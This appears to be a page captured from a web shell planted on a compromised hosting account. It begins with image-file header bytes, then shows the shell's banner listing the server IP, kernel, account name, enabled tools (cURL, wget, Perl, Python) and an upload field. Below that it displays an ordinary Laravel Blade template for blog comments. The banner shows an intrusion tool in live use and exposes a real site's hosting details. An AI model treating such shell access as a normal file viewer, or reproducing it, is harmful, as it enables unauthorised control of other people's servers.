����JFIF��x�x����'
Server IP : 66.29.137.217 / Your IP : 18.118.253.134 Web Server : LiteSpeed System : Linux premium294.web-hosting.com 4.18.0-513.11.1.lve.el8.x86_64 #1 SMP Thu Jan 18 16:21:02 UTC 2024 x86_64 User : gltevjme ( 1095) PHP Version : 7.0.33 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /home/gltevjme/bofirmacademy.com/resources/views/frontend/blog/ |
Upload File : |
<h6 class="blog-comment-title">{{ @$blogComments->count() }} {{ __('comments') }}</h6> @foreach($blogComments as $blogComment) <!-- Single Comments--> <div class="main-comment"> <div class="blog-comment-item"> <div class="comment-author-img radius-50 overflow-hidden"> <img src="{{ getImageFile(@$blogComment->user->image_path) }}" alt="avatar"> </div> <div class="author-details"> <h6 class="author-name font-16">{{ @$blogComment->user->name }}</h6> <div class="comment-date-time color-gray font-12">{{ @$blogComment->created_at->format(' j M, Y') }} AT @php $timestamp = strtotime($blogComment->created_at); $time = date("h:i A", $timestamp); @endphp {{ @$time }}</div> <p>{{ $blogComment->comment }}</p> @if(@Auth::user()) <button class="blog-reply-btn font-medium color-hover text-decoration-underline reply-btn font-12 replyBtn" data-bs-toggle="modal" data-bs-target="#commentReplyModal" data-parent_id="{{ $blogComment->id }}"> {{ __('Reply') }} <span class="iconify" data-icon="la:angle-right"></span></button> @endif </div> </div> @foreach($blogComment->blogCommentReplies as $reply) <!-- Under Single Comments--> <div class="blog-comment-item under-comment"> <div class="comment-author-img radius-50 overflow-hidden"> <img src="{{ getImageFile(@$reply->user->image_path) }}" alt="avatar"> </div> <div class="author-details"> <h6 class="author-name font-16">{{ @$reply->user->name }}</h6> <div class="comment-date-time color-gray font-12"> {{ @$reply->created_at->format(' j M, Y') }} AT @php $timestamp = strtotime($reply->created_at); $time = date("h:i A", $timestamp); @endphp {{ @$time }} </div> <p>{{ $reply->comment }} </p> @if(@Auth::user()) <button class="blog-reply-btn font-medium color-hover text-decoration-underline reply-btn font-12 replyBtn" data-bs-toggle="modal" data-bs-target="#commentReplyModal" data-parent_id="{{ $blogComment->id }}">{{ __('Reply') }} <span class="iconify" data-icon="la:angle-right"></span></button> @endif </div> </div> <!-- Under Single Comments--> @endforeach </div> <!-- Single Comments--> @endforeach